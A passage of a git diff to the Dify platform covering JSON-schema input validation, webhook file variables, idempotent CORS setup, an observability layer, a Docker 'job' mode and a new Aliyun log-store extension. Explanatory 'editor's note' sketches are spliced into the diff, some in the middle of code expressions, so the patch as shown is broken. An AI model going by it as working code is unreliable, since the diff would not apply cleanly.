prompt_messages[-1].content) + else: + prompt_messages.append(UserPromptMessage(content=file_prompts)) + # Remove empty messages and filter unsupported content filtered_prompt_messages = [] for prompt_message in prompt_messages: diff --git a/api/core/workflow/nodes/question_classifier/question_classifier_node.py b/api/core/workflow/nodes/question_classifier/question_classifier_node.py index db3d4d4aac..4a3e8e56f8 100644 --- a/api/core/workflow/nodes/question_classifier/question_classifier_node.py +++ b/api/core/workflow/nodes/question_classifier/question_classifier_node.py @@ -221,6 +221,7 @@ class QuestionClassifierNode(Node[QuestionClassifierNodeData]): status=WorkflowNodeExecutionStatus.FAILED, inputs=variables, error=str(e), + error_type=type(e).__name__, metadata={ WorkflowNodeExecutionMetadataKey.TOTAL_TOKENS: usage.total_tokens, WorkflowNodeExecutionMetadataKey.TOTAL_PRICE: usage.total_price, diff --git a/api/core/workflow/nodes/start/start_node.py b/api/core/workflow/nodes/start/start_node.py index 38effa79f7..36fc5078c5 100644 --- a/api/core/workflow/nodes/start/start_node.py +++ b/api/core/workflow/nodes/start/start_node.py @@ -1,3 +1,4 @@ +import json from typing import Any from jsonschema import Draft7Validator, ValidationError @@ -42,15 +43,25 @@ class StartNode(Node[StartNodeData]): if value is None and variable.required: raise ValueError(f"{key} is required in input form") - if not isinstance(value, dict): - raise ValueError(f"{key} must be a JSON object") - schema = variable.json_schema if not schema: continue + if not value: + continue + try: - Draft7Validator(schema).validate(value) + json_schema = 
json.loads(schema)
+            except json.JSONDecodeError as e:
+                raise ValueError(f"JSON schema for '{key}' is not valid JSON") from e
+
+            try:
+                json_value = json.loads(value)
+            except json.JSONDecodeError as e:
+                raise ValueError(f"Value for '{key}' is not valid JSON") from e
+
+            try:
+                Draft7Validator(json_schema).validate(json_value)
             except ValidationError as e:
                 raise ValueError(f"JSON object for '{key}' does not match schema: {e.message}")
 
-            node_inputs[key] = value
+            node_inputs[key] = json_value
diff --git a/api/core/workflow/nodes/trigger_webhook/node.py b/api/core/workflow/nodes/trigger_webhook/node.py
index 3631c8653d..ec8c4b8ee3 100644
--- a/api/core/workflow/nodes/trigger_webhook/node.py
+++ b/api/core/workflow/nodes/trigger_webhook/node.py
@@ -1,14 +1,22 @@
+import logging
 from collections.abc import Mapping
 from typing import Any
 
+from core.file import FileTransferMethod
+from core.variables.types import SegmentType
+from core.variables.variables import FileVariable
 from core.workflow.constants import SYSTEM_VARIABLE_NODE_ID
 from core.workflow.entities.workflow_node_execution import WorkflowNodeExecutionStatus
 from core.workflow.enums import NodeExecutionType, NodeType
 from core.workflow.node_events import NodeRunResult
 from core.workflow.nodes.base.node import Node
+from factories import file_factory
+from factories.variable_factory import build_segment_with_type
 
 from .entities import ContentType, WebhookData
 
+logger = logging.getLogger(__name__)
+
 
 class TriggerWebhookNode(Node[WebhookData]):
     node_type = NodeType.TRIGGER_WEBHOOK
@@ -60,6 +68,34 @@ class TriggerWebhookNode(Node[WebhookData]):
             outputs=outputs,
         )
 
+    def generate_file_var(self, param_name: str, file: dict):
+        related_id = file.get("related_id")
+        transfer_method_value = file.get("transfer_method")
+        if transfer_method_value:
+            transfer_method = FileTransferMethod.value_of(transfer_method_value)
+            match transfer_method:
+                case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
+                    file["upload_file_id"] = related_id
+                case FileTransferMethod.TOOL_FILE:
+                    file["tool_file_id"] = related_id
+                case FileTransferMethod.DATASOURCE_FILE:
+                    file["datasource_file_id"] = related_id
+
+        try:
+            file_obj = file_factory.build_from_mapping(
+                mapping=file,
+                tenant_id=self.tenant_id,
+            )
+            file_segment = build_segment_with_type(SegmentType.FILE, file_obj)
+            return FileVariable(name=param_name, value=file_segment.value, selector=[self.id, param_name])
+        except ValueError:
+            logger.error(
+                "Failed to build FileVariable for webhook file parameter %s",
+                param_name,
+                exc_info=True,
+            )
+            return None
+
     def _extract_configured_outputs(self, webhook_inputs: dict[str, Any]) -> dict[str, Any]:
         """Extract outputs based on node configuration from webhook inputs."""
         outputs = {}
@@ -107,18 +143,33 @@ class TriggerWebhookNode(Node[WebhookData]):
                     outputs[param_name] = str(webhook_data.get("body", {}).get("raw", ""))
                     continue
                 elif self.node_data.content_type == ContentType.BINARY:
-                    outputs[param_name] = webhook_data.get("body", {}).get("raw", b"")
+                    raw_data: dict = webhook_data.get("body", {}).get("raw", {})
+                    file_var = self.generate_file_var(param_name, raw_data)
+                    if file_var:
+                        outputs[param_name] = file_var
+                    else:
+                        outputs[param_name] = raw_data
                     continue
 
             if param_type == "file":
                 # Get File object (already processed by webhook controller)
-                file_obj = webhook_data.get("files", {}).get(param_name)
-                outputs[param_name] = file_obj
+                files = webhook_data.get("files", {})
+                if files and isinstance(files, dict):
+                    file = files.get(param_name)
+                    if file and 
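# [Editor's note] Illustrative sketch, not part of this diff: the Start node's
# new validation flow for JSON-typed inputs, standalone. Both the configured
# schema and the submitted value arrive as strings, so each is parsed before
# Draft-7 validation, and the parsed value (not the raw string) is what lands
# in node_inputs. Variable contents here are hypothetical.
import json

from jsonschema import Draft7Validator, ValidationError

schema_str = '{"type": "object", "required": ["name"]}'
value_str = '{"name": "dify"}'

json_schema = json.loads(schema_str)  # raises JSONDecodeError if malformed
json_value = json.loads(value_str)

try:
    Draft7Validator(json_schema).validate(json_value)
except ValidationError as e:
    raise ValueError(f"JSON object does not match schema: {e.message}") from e

node_inputs = {"input_key": json_value}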
isinstance(file, dict): + file_var = self.generate_file_var(param_name, file) + if file_var: + outputs[param_name] = file_var + else: + outputs[param_name] = files + else: + outputs[param_name] = files + else: + outputs[param_name] = files else: # Get regular body parameter outputs[param_name] = webhook_data.get("body", {}).get(param_name) # Include raw webhook data for debugging/advanced use outputs["_webhook_raw"] = webhook_data - return outputs diff --git a/api/core/workflow/workflow_entry.py b/api/core/workflow/workflow_entry.py index d4ec29518a..ddf545bb34 100644 --- a/api/core/workflow/workflow_entry.py +++ b/api/core/workflow/workflow_entry.py @@ -14,7 +14,7 @@ from core.workflow.errors import WorkflowNodeRunFailedError from core.workflow.graph import Graph from core.workflow.graph_engine import GraphEngine from core.workflow.graph_engine.command_channels import InMemoryChannel -from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer +from core.workflow.graph_engine.layers import DebugLoggingLayer, ExecutionLimitsLayer, ObservabilityLayer from core.workflow.graph_engine.protocols.command_channel import CommandChannel from core.workflow.graph_events import GraphEngineEvent, GraphNodeEventBase, GraphRunFailedEvent from core.workflow.nodes import NodeType @@ -23,6 +23,7 @@ from core.workflow.nodes.node_mapping import NODE_TYPE_CLASSES_MAPPING from core.workflow.runtime import GraphRuntimeState, VariablePool from core.workflow.system_variable import SystemVariable from core.workflow.variable_loader import DUMMY_VARIABLE_LOADER, VariableLoader, load_into_variable_pool +from extensions.otel.runtime import is_instrument_flag_enabled from factories import file_factory from models.enums import UserFrom from models.workflow import Workflow @@ -98,6 +99,10 @@ class WorkflowEntry: ) self.graph_engine.layer(limits_layer) + # Add observability layer when OTel is enabled + if dify_config.ENABLE_OTEL or is_instrument_flag_enabled(): + self.graph_engine.layer(ObservabilityLayer()) + def run(self) -> Generator[GraphEngineEvent, None, None]: graph_engine = self.graph_engine diff --git a/api/docker/entrypoint.sh b/api/docker/entrypoint.sh index 6313085e64..5a69eb15ac 100755 --- a/api/docker/entrypoint.sh +++ b/api/docker/entrypoint.sh @@ -34,10 +34,10 @@ if [[ "${MODE}" == "worker" ]]; then if [[ -z "${CELERY_QUEUES}" ]]; then if [[ "${EDITION}" == "CLOUD" ]]; then # Cloud edition: separate queues for dataset and trigger tasks - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow_professional,workflow_team,workflow_sandbox,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" else # Community edition (SELF_HOSTED): dataset, pipeline and workflow have separate queues - DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor" + 
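# [Editor's note] Illustrative sketch, not part of this diff: the transfer-method
# dispatch inside generate_file_var above. Depending on how the file reached the
# webhook, the same related_id is copied into a different key before
# file_factory.build_from_mapping is called. The enum here is a simplified
# stand-in for core.file.FileTransferMethod.
from enum import StrEnum

class FileTransferMethod(StrEnum):
    LOCAL_FILE = "local_file"
    REMOTE_URL = "remote_url"
    TOOL_FILE = "tool_file"
    DATASOURCE_FILE = "datasource_file"

def id_key_for(method: FileTransferMethod) -> str:
    match method:
        case FileTransferMethod.LOCAL_FILE | FileTransferMethod.REMOTE_URL:
            return "upload_file_id"
        case FileTransferMethod.TOOL_FILE:
            return "tool_file_id"
        case FileTransferMethod.DATASOURCE_FILE:
            return "datasource_file_id"
    raise ValueError(method)

file = {"related_id": "abc123", "transfer_method": "tool_file"}
file[id_key_for(FileTransferMethod(file["transfer_method"]))] = file["related_id"]
# file now also carries {"tool_file_id": "abc123"}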
DEFAULT_QUEUES="dataset,priority_dataset,priority_pipeline,pipeline,mail,ops_trace,app_deletion,plugin,workflow_storage,conversation,workflow,schedule_poller,schedule_executor,triggered_workflow_dispatcher,trigger_refresh_executor,retention" fi else DEFAULT_QUEUES="${CELERY_QUEUES}" @@ -69,6 +69,53 @@ if [[ "${MODE}" == "worker" ]]; then elif [[ "${MODE}" == "beat" ]]; then exec celery -A app.celery beat --loglevel ${LOG_LEVEL:-INFO} + +elif [[ "${MODE}" == "job" ]]; then + # Job mode: Run a one-time Flask command and exit + # Pass Flask command and arguments via container args + # Example K8s usage: + # args: + # - create-tenant + # - --email + # - admin@example.com + # + # Example Docker usage: + # docker run -e MODE=job dify-api:latest create-tenant --email admin@example.com + + if [[ $# -eq 0 ]]; then + echo "Error: No command specified for job mode." + echo "" + echo "Usage examples:" + echo " Kubernetes:" + echo " args: [create-tenant, --email, admin@example.com]" + echo "" + echo " Docker:" + echo " docker run -e MODE=job dify-api create-tenant --email admin@example.com" + echo "" + echo "Available commands:" + echo " create-tenant, reset-password, reset-email, upgrade-db," + echo " vdb-migrate, install-plugins, and more..." + echo "" + echo "Run 'flask --help' to see all available commands." + exit 1 + fi + + echo "Running Flask job command: flask $*" + + # Temporarily disable exit on error to capture exit code + set +e + flask "$@" + JOB_EXIT_CODE=$? + set -e + + if [[ ${JOB_EXIT_CODE} -eq 0 ]]; then + echo "Job completed successfully." + else + echo "Job failed with exit code ${JOB_EXIT_CODE}." + fi + + exit ${JOB_EXIT_CODE} + else if [[ "${DEBUG}" == "true" ]]; then exec flask run --host=${DIFY_BIND_ADDRESS:-0.0.0.0} --port=${DIFY_PORT:-5001} --debug diff --git a/api/events/event_handlers/clean_when_dataset_deleted.py b/api/events/event_handlers/clean_when_dataset_deleted.py index 1666e2e29f..d6007662d8 100644 --- a/api/events/event_handlers/clean_when_dataset_deleted.py +++ b/api/events/event_handlers/clean_when_dataset_deleted.py @@ -15,4 +15,5 @@ def handle(sender: Dataset, **kwargs): dataset.index_struct, dataset.collection_binding_id, dataset.doc_form, + dataset.pipeline_id, ) diff --git a/api/extensions/ext_blueprints.py b/api/extensions/ext_blueprints.py index 725e5351e6..cf994c11df 100644 --- a/api/extensions/ext_blueprints.py +++ b/api/extensions/ext_blueprints.py @@ -9,11 +9,21 @@ FILES_HEADERS: tuple[str, ...] = (*BASE_CORS_HEADERS, HEADER_NAME_CSRF_TOKEN) EXPOSED_HEADERS: tuple[str, ...] 
= ("X-Version", "X-Env", "X-Trace-Id") -def init_app(app: DifyApp): - # register blueprint routers +def _apply_cors_once(bp, /, **cors_kwargs): + """Make CORS idempotent so blueprints can be reused across multiple app instances.""" + + if getattr(bp, "_dify_cors_applied", False): + return from flask_cors import CORS + CORS(bp, **cors_kwargs) + bp._dify_cors_applied = True + + +def init_app(app: DifyApp): + # register blueprint routers + from controllers.console import bp as console_app_bp from controllers.files import bp as files_bp from controllers.inner_api import bp as inner_api_bp @@ -22,7 +32,7 @@ def init_app(app: DifyApp): from controllers.trigger import bp as trigger_bp from controllers.web import bp as web_bp - CORS( + _apply_cors_once( service_api_bp, allow_headers=list(SERVICE_API_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -30,7 +40,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(service_api_bp) - CORS( + _apply_cors_once( web_bp, resources={r"/*": {"origins": dify_config.WEB_API_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -40,7 +50,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(web_bp) - CORS( + _apply_cors_once( console_app_bp, resources={r"/*": {"origins": dify_config.CONSOLE_CORS_ALLOW_ORIGINS}}, supports_credentials=True, @@ -50,7 +60,7 @@ def init_app(app: DifyApp): ) app.register_blueprint(console_app_bp) - CORS( + _apply_cors_once( files_bp, allow_headers=list(FILES_HEADERS), methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH"], @@ -62,7 +72,7 @@ def init_app(app: DifyApp): app.register_blueprint(mcp_bp) # Register trigger blueprint with CORS for webhook calls - CORS( + _apply_cors_once( trigger_bp, allow_headers=["Content-Type", "Authorization", "X-App-Code"], methods=["GET", "PUT", "POST", "DELETE", "OPTIONS", "PATCH", "HEAD"], diff --git a/api/extensions/ext_logstore.py b/api/extensions/ext_logstore.py new file mode 100644 index 0000000000..502f0bb46b --- /dev/null +++ b/api/extensions/ext_logstore.py @@ -0,0 +1,74 @@ +""" +Logstore extension for Dify application. + +This extension initializes the logstore (Aliyun SLS) on application startup, +creating necessary projects, logstores, and indexes if they don't exist. +""" + +import logging +import os + +from dotenv import load_dotenv + +from dify_app import DifyApp + +logger = logging.getLogger(__name__) + + +def is_enabled() -> bool: + """ + Check if logstore extension is enabled. + + Returns: + True if all required Aliyun SLS environment variables are set, False otherwise + """ + # Load environment variables from .env file + load_dotenv() + + required_vars = [ + "ALIYUN_SLS_ACCESS_KEY_ID", + "ALIYUN_SLS_ACCESS_KEY_SECRET", + "ALIYUN_SLS_ENDPOINT", + "ALIYUN_SLS_REGION", + "ALIYUN_SLS_PROJECT_NAME", + ] + + all_set = all(os.environ.get(var) for var in required_vars) + + if not all_set: + logger.info("Logstore extension disabled: required Aliyun SLS environment variables not set") + + return all_set + + +def init_app(app: DifyApp): + """ + Initialize logstore on application startup. + + This function: + 1. Creates Aliyun SLS project if it doesn't exist + 2. Creates logstores (workflow_execution, workflow_node_execution) if they don't exist + 3. Creates indexes with field configurations based on PostgreSQL table structures + + This operation is idempotent and only executes once during application startup. 
+ + Args: + app: The Dify application instance + """ + try: + from extensions.logstore.aliyun_logstore import AliyunLogStore + + logger.info("Initializing logstore...") + + # Create logstore client and initialize project/logstores/indexes + logstore_client = AliyunLogStore() + logstore_client.init_project_logstore() + + # Attach to app for potential later use + app.extensions["logstore"] = logstore_client + + logger.info("Logstore initialized successfully") + except Exception: + logger.exception("Failed to initialize logstore") + # Don't raise - allow application to continue even if logstore init fails + # This ensures that the application can still run if logstore is misconfigured diff --git a/api/extensions/ext_session_factory.py b/api/extensions/ext_session_factory.py new file mode 100644 index 0000000000..0eb43d66f4 --- /dev/null +++ b/api/extensions/ext_session_factory.py @@ -0,0 +1,7 @@ +from core.db.session_factory import configure_session_factory +from extensions.ext_database import db + + +def init_app(app): + with app.app_context(): + configure_session_factory(db.engine) diff --git a/api/extensions/logstore/__init__.py b/api/extensions/logstore/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/extensions/logstore/aliyun_logstore.py b/api/extensions/logstore/aliyun_logstore.py new file mode 100644 index 0000000000..22d1f473a3 --- /dev/null +++ b/api/extensions/logstore/aliyun_logstore.py @@ -0,0 +1,890 @@ +import logging +import os +import threading +import time +from collections.abc import Sequence +from typing import Any + +import sqlalchemy as sa +from aliyun.log import ( # type: ignore[import-untyped] + GetLogsRequest, + IndexConfig, + IndexKeyConfig, + IndexLineConfig, + LogClient, + LogItem, + PutLogsRequest, +) +from aliyun.log.auth import AUTH_VERSION_4 # type: ignore[import-untyped] +from aliyun.log.logexception import LogException # type: ignore[import-untyped] +from dotenv import load_dotenv +from sqlalchemy.orm import DeclarativeBase + +from configs import dify_config +from extensions.logstore.aliyun_logstore_pg import AliyunLogStorePG + +logger = logging.getLogger(__name__) + + +class AliyunLogStore: + """ + Singleton class for Aliyun SLS LogStore operations. + + Ensures only one instance exists to prevent multiple PG connection pools. + """ + + _instance: "AliyunLogStore | None" = None + _initialized: bool = False + + # Track delayed PG connection for newly created projects + _pg_connection_timer: threading.Timer | None = None + _pg_connection_delay: int = 90 # delay seconds + + # Default tokenizer for text/json fields and full-text index + # Common delimiters: comma, space, quotes, punctuation, operators, brackets, special chars + DEFAULT_TOKEN_LIST = [ + ",", + " ", + '"', + '"', + ";", + "=", + "(", + ")", + "[", + "]", + "{", + "}", + "?", + "@", + "&", + "<", + ">", + "/", + ":", + "\n", + "\t", + ] + + def __new__(cls) -> "AliyunLogStore": + """Implement singleton pattern.""" + if cls._instance is None: + cls._instance = super().__new__(cls) + return cls._instance + + project_des = "dify" + + workflow_execution_logstore = "workflow_execution" + + workflow_node_execution_logstore = "workflow_node_execution" + + @staticmethod + def _sqlalchemy_type_to_logstore_type(column: Any) -> str: + """ + Map SQLAlchemy column type to Aliyun LogStore index type. 
+ + Args: + column: SQLAlchemy column object + + Returns: + LogStore index type: 'text', 'long', 'double', or 'json' + """ + column_type = column.type + + # Integer types -> long + if isinstance(column_type, (sa.Integer, sa.BigInteger, sa.SmallInteger)): + return "long" + + # Float types -> double + if isinstance(column_type, (sa.Float, sa.Numeric)): + return "double" + + # String and Text types -> text + if isinstance(column_type, (sa.String, sa.Text)): + return "text" + + # DateTime -> text (stored as ISO format string in logstore) + if isinstance(column_type, sa.DateTime): + return "text" + + # Boolean -> long (stored as 0/1) + if isinstance(column_type, sa.Boolean): + return "long" + + # JSON -> json + if isinstance(column_type, sa.JSON): + return "json" + + # Default to text for unknown types + return "text" + + @staticmethod + def _generate_index_keys_from_model(model_class: type[DeclarativeBase]) -> dict[str, IndexKeyConfig]: + """ + Automatically generate LogStore field index configuration from SQLAlchemy model. + + This method introspects the SQLAlchemy model's column definitions and creates + corresponding LogStore index configurations. When the PG schema is updated via + Flask-Migrate, this method will automatically pick up the new fields on next startup. + + Args: + model_class: SQLAlchemy model class (e.g., WorkflowRun, WorkflowNodeExecutionModel) + + Returns: + Dictionary mapping field names to IndexKeyConfig objects + """ + index_keys = {} + + # Iterate over all mapped columns in the model + if hasattr(model_class, "__mapper__"): + for column_name, column_property in model_class.__mapper__.columns.items(): + # Skip relationship properties and other non-column attributes + if not hasattr(column_property, "type"): + continue + + # Map SQLAlchemy type to LogStore type + logstore_type = AliyunLogStore._sqlalchemy_type_to_logstore_type(column_property) + + # Create index configuration + # - text fields: case_insensitive for better search, with tokenizer and Chinese support + # - all fields: doc_value=True for analytics + if logstore_type == "text": + index_keys[column_name] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=AliyunLogStore.DEFAULT_TOKEN_LIST, + chinese=True, + ) + else: + index_keys[column_name] = IndexKeyConfig(index_type=logstore_type, doc_value=True) + + # Add log_version field (not in PG model, but used in logstore for versioning) + index_keys["log_version"] = IndexKeyConfig(index_type="long", doc_value=True) + + return index_keys + + def __init__(self) -> None: + # Skip initialization if already initialized (singleton pattern) + if self.__class__._initialized: + return + + load_dotenv() + + self.access_key_id: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_ID", "") + self.access_key_secret: str = os.environ.get("ALIYUN_SLS_ACCESS_KEY_SECRET", "") + self.endpoint: str = os.environ.get("ALIYUN_SLS_ENDPOINT", "") + self.region: str = os.environ.get("ALIYUN_SLS_REGION", "") + self.project_name: str = os.environ.get("ALIYUN_SLS_PROJECT_NAME", "") + self.logstore_ttl: int = int(os.environ.get("ALIYUN_SLS_LOGSTORE_TTL", 365)) + self.log_enabled: bool = os.environ.get("SQLALCHEMY_ECHO", "false").lower() == "true" + self.pg_mode_enabled: bool = os.environ.get("LOGSTORE_PG_MODE_ENABLED", "true").lower() == "true" + + # Initialize SDK client + self.client = LogClient( + self.endpoint, self.access_key_id, self.access_key_secret, auth_version=AUTH_VERSION_4, region=self.region + ) + + # Append Dify identification to the existing 
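# [Editor's note] Illustrative sketch, not part of this diff: the model
# introspection described above, applied to a toy SQLAlchemy model. The real
# code walks model.__mapper__.columns the same way; only the model here is
# hypothetical.
import sqlalchemy as sa
from sqlalchemy.orm import DeclarativeBase, Mapped, mapped_column

class Base(DeclarativeBase):
    pass

class ToyRun(Base):
    __tablename__ = "toy_run"
    id: Mapped[str] = mapped_column(sa.String, primary_key=True)
    tokens: Mapped[int] = mapped_column(sa.Integer)
    cost: Mapped[float] = mapped_column(sa.Float)
    meta: Mapped[dict] = mapped_column(sa.JSON)

def logstore_type(column) -> str:
    t = column.type
    if isinstance(t, (sa.Integer, sa.BigInteger, sa.SmallInteger, sa.Boolean)):
        return "long"   # booleans are stored as 0/1
    if isinstance(t, (sa.Float, sa.Numeric)):
        return "double"
    if isinstance(t, sa.JSON):
        return "json"
    return "text"       # String/Text/DateTime and unknown types

print({name: logstore_type(col) for name, col in ToyRun.__mapper__.columns.items()})
# {'id': 'text', 'tokens': 'long', 'cost': 'double', 'meta': 'json'}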
user agent
+        original_user_agent = self.client._user_agent  # pyright: ignore[reportPrivateUsage]
+        dify_version = dify_config.project.version
+        enhanced_user_agent = f"Dify,Dify-{dify_version},{original_user_agent}"
+        self.client.set_user_agent(enhanced_user_agent)
+
+        # PG client will be initialized in init_project_logstore
+        self._pg_client: AliyunLogStorePG | None = None
+        self._use_pg_protocol: bool = False
+
+        self.__class__._initialized = True
+
+    @property
+    def supports_pg_protocol(self) -> bool:
+        """Check if PG protocol is supported and enabled."""
+        return self._use_pg_protocol
+
+    def _attempt_pg_connection_init(self) -> bool:
+        """
+        Attempt to initialize PG connection.
+
+        This method tries to establish a PG connection and performs the necessary checks.
+        It's used both for immediate connection (existing projects) and delayed connection (new projects).
+
+        Returns:
+            True if PG connection was successfully established, False otherwise.
+        """
+        if not self.pg_mode_enabled or not self._pg_client:
+            return False
+
+        try:
+            self._use_pg_protocol = self._pg_client.init_connection()
+            if self._use_pg_protocol:
+                logger.info("Successfully connected to project %s using PG protocol", self.project_name)
+                # Check if scan_index is enabled for all logstores
+                self._check_and_disable_pg_if_scan_index_disabled()
+                return True
+            else:
+                logger.info("PG connection failed for project %s. Will use SDK mode.", self.project_name)
+                return False
+        except Exception as e:
+            logger.warning(
+                "Failed to establish PG connection for project %s: %s. Will use SDK mode.",
+                self.project_name,
+                str(e),
+            )
+            self._use_pg_protocol = False
+            return False
+
+    def _delayed_pg_connection_init(self) -> None:
+        """
+        Delayed initialization of PG connection for newly created projects.
+
+        This method is called by a background timer _pg_connection_delay seconds
+        (default: 90) after project creation.
+        """
+        # Double-check conditions in case state changed
+        if self._use_pg_protocol:
+            return
+
+        logger.info(
+            "Attempting delayed PG connection for newly created project %s ...",
+            self.project_name,
+        )
+        self._attempt_pg_connection_init()
+        self.__class__._pg_connection_timer = None
+
+    def init_project_logstore(self):
+        """
+        Initialize project, logstore, index, and PG connection.
+
+        This method should be called once during application startup to ensure
+        all required resources exist and connections are established.
+        """
+        # Step 1: Ensure project and logstore exist
+        project_is_new = False
+        if not self.is_project_exist():
+            self.create_project()
+            project_is_new = True
+
+        self.create_logstore_if_not_exist()
+
+        # Step 2: Initialize PG client and connection (if enabled)
+        if not self.pg_mode_enabled:
+            logger.info("PG mode is disabled. Will use SDK mode.")
+            return
+
+        # Create PG client if not already created
+        if self._pg_client is None:
+            logger.info("Initializing PG client for project %s...", self.project_name)
+            self._pg_client = AliyunLogStorePG(
+                self.access_key_id, self.access_key_secret, self.endpoint, self.project_name
+            )
+
+        # Step 3: Establish PG connection based on project status
+        if project_is_new:
+            # For newly created projects, schedule delayed PG connection
+            self._use_pg_protocol = False
+            logger.info(
+                "Project %s is newly created. 
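# [Editor's note] Illustrative sketch, not part of this diff: the
# cancel-then-reschedule daemon-timer pattern used for the delayed PG connection
# attempt. The daemon flag keeps a pending attempt from blocking interpreter
# shutdown; cancelling first ensures at most one timer is live.
import threading

_timer: threading.Timer | None = None

def schedule_once(delay_seconds: float, action) -> None:
    global _timer
    if _timer is not None:
        _timer.cancel()        # drop any previously scheduled attempt
    _timer = threading.Timer(delay_seconds, action)
    _timer.daemon = True       # do not block app shutdown
    _timer.start()

schedule_once(90, lambda: print("attempting delayed PG connection..."))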
Will use SDK mode and schedule PG connection attempt in %d seconds.", + self.project_name, + self.__class__._pg_connection_delay, + ) + if self.__class__._pg_connection_timer is not None: + self.__class__._pg_connection_timer.cancel() + self.__class__._pg_connection_timer = threading.Timer( + self.__class__._pg_connection_delay, + self._delayed_pg_connection_init, + ) + self.__class__._pg_connection_timer.daemon = True # Don't block app shutdown + self.__class__._pg_connection_timer.start() + else: + # For existing projects, attempt PG connection immediately + logger.info("Project %s already exists. Attempting PG connection...", self.project_name) + self._attempt_pg_connection_init() + + def _check_and_disable_pg_if_scan_index_disabled(self) -> None: + """ + Check if scan_index is enabled for all logstores. + If any logstore has scan_index=false, disable PG protocol. + + This is necessary because PG protocol requires scan_index to be enabled. + """ + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + existing_config = self.get_existing_index_config(logstore_name) + if existing_config and not existing_config.scan_index: + logger.info( + "Logstore %s has scan_index=false, USE SDK mode for read/write operations. " + "PG protocol requires scan_index to be enabled.", + logstore_name, + ) + self._use_pg_protocol = False + # Close PG connection if it was initialized + if self._pg_client: + self._pg_client.close() + self._pg_client = None + return + + def is_project_exist(self) -> bool: + try: + self.client.get_project(self.project_name) + return True + except Exception as e: + if e.args[0] == "ProjectNotExist": + return False + else: + raise e + + def create_project(self): + try: + self.client.create_project(self.project_name, AliyunLogStore.project_des) + logger.info("Project %s created successfully", self.project_name) + except LogException as e: + logger.exception( + "Failed to create project %s: errorCode=%s, errorMessage=%s, requestId=%s", + self.project_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + def is_logstore_exist(self, logstore_name: str) -> bool: + try: + _ = self.client.get_logstore(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "LogStoreNotExist": + return False + else: + raise e + + def create_logstore_if_not_exist(self) -> None: + logstore_name_list = [ + AliyunLogStore.workflow_execution_logstore, + AliyunLogStore.workflow_node_execution_logstore, + ] + + for logstore_name in logstore_name_list: + if not self.is_logstore_exist(logstore_name): + try: + self.client.create_logstore( + project_name=self.project_name, logstore_name=logstore_name, ttl=self.logstore_ttl + ) + logger.info("logstore %s created successfully", logstore_name) + except LogException as e: + logger.exception( + "Failed to create logstore %s: errorCode=%s, errorMessage=%s, requestId=%s", + logstore_name, + e.get_error_code(), + e.get_error_message(), + e.get_request_id(), + ) + raise + + # Ensure index contains all Dify-required fields + # This intelligently merges with existing config, preserving custom indexes + self.ensure_index_config(logstore_name) + + def is_index_exist(self, logstore_name: str) -> bool: + try: + _ = self.client.get_index_config(self.project_name, logstore_name) + return True + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return False + else: + raise e + + def 
get_existing_index_config(self, logstore_name: str) -> IndexConfig | None: + """ + Get existing index configuration from logstore. + + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object if index exists, None otherwise + """ + try: + response = self.client.get_index_config(self.project_name, logstore_name) + return response.get_index_config() + except Exception as e: + if e.args[0] == "IndexConfigNotExist": + return None + else: + logger.exception("Failed to get index config for logstore %s", logstore_name) + raise e + + def _get_workflow_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_execution logstore. + + This method automatically generates index configuration from the WorkflowRun SQLAlchemy model. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. + """ + from models.workflow import WorkflowRun + + index_keys = self._generate_index_keys_from_model(WorkflowRun) + + # Add custom fields that are in logstore but not in PG model + # These fields are added by the repository layer + index_keys["error_message"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'error' in PG + index_keys["started_at"] = IndexKeyConfig( + index_type="text", + case_sensitive=False, + doc_value=True, + token_list=self.DEFAULT_TOKEN_LIST, + chinese=True, + ) # Maps to 'created_at' in PG + + logger.info("Generated %d index keys for workflow_execution from WorkflowRun model", len(index_keys)) + return index_keys + + def _get_workflow_node_execution_index_keys(self) -> dict[str, IndexKeyConfig]: + """ + Get field index configuration for workflow_node_execution logstore. + + This method automatically generates index configuration from the WorkflowNodeExecutionModel. + When the PG schema is updated via Flask-Migrate, the index configuration will be automatically + updated on next application startup. + """ + from models.workflow import WorkflowNodeExecutionModel + + index_keys = self._generate_index_keys_from_model(WorkflowNodeExecutionModel) + + logger.debug( + "Generated %d index keys for workflow_node_execution from WorkflowNodeExecutionModel", len(index_keys) + ) + return index_keys + + def _get_index_config(self, logstore_name: str) -> IndexConfig: + """ + Get index configuration for the specified logstore. + + Args: + logstore_name: Name of the logstore + + Returns: + IndexConfig object with line and field indexes + """ + # Create full-text index (line config) with tokenizer + line_config = IndexLineConfig(token_list=self.DEFAULT_TOKEN_LIST, case_sensitive=False, chinese=True) + + # Get field index configuration based on logstore name + field_keys = {} + if logstore_name == 